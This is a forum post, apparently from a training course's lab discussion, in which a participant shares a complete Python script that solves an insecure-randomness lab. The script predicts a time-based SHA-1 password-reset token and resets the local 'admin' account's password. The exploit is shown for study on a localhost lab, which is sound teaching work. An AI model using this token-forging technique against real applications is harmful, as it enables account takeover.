Welcome to the Linux Foundation Forum!

Lack of Resources for Lab 4.1 - Insecure Randomness in Web Applications

Hello everyone,

I've been working on Lab 4.1, which involves exploiting weak randomization in a password reset function. However, the provided resources are insufficient for completing the lab effectively.

  • No guidance on interacting with the web application endpoints to exploit the vulnerability.
  • The provided solution uses a static datetime, not reflecting the dynamic nature of the actual application.

To help others, here’s a script that completes the lab, with added print statements for clarity:

  1. import requests
  2. import hashlib
  3. import datetime
  4. import time
  5.  
  6. base_url = 'http://localhost:5000'
  7.  
  8. # Step 1: Trigger the forget password functionality
  9. forget_password_url = f'{base_url}/passwordForget'
  10. admin_username = 'admin'
  11. print(f"[INFO] Initiating password reset for user '{admin_username}'...")
  12. response = requests.post(forget_password_url, data={'username': admin_username})
  13.  
  14. if response.status_code == 200:
  15. print("[INFO] Password reset request sent successfully.")
  16. else:
  17. print("[ERROR] Failed to send password reset request.")
  18. exit()
  19.  
  20. # Step 2: Wait a second to ensure the timestamp is accurate
  21. time.sleep(1)
  22.  
  23. # Calculate the reset token
  24. current_time = datetime.datetime.now()
  25. timestamp = current_time.second
  26. to_hash = admin_username + str(timestamp)
  27. reset_token = hashlib.sha1(to_hash.encode('utf-8')).hexdigest()
  28.  
  29. print(f"[INFO] Calculated reset token: {reset_token}")
  30.  
  31. # Step 3: Use the reset token to reset the admin's password
  32. reset_password_url = f'{base_url}/reset'
  33. new_password = 'password1'
  34. print(f"[INFO] Sending password reset request with token '{reset_token}' and new password '{new_password}'...")
  35. response = requests.post(reset_password_url, data={
  36. 'resetToken': reset_token,
  37. 'username': admin_username,
  38. 'password': new_password
  39. })
  40.  
  41. if response.status_code == 200:
  42. print(f"[SUCCESS] Password for user '{admin_username}' has been reset to '{new_password}'.")
  43. else:
  44. print(f"[ERROR] Failed to reset the password. Server responded with status code {response.status_code}.")

Comments

Welcome!

It looks like you're new here. Sign in or register to get started.
Sign In

Welcome!

It looks like you're new here. Sign in or register to get started.
Sign In

Categories

Upcoming Training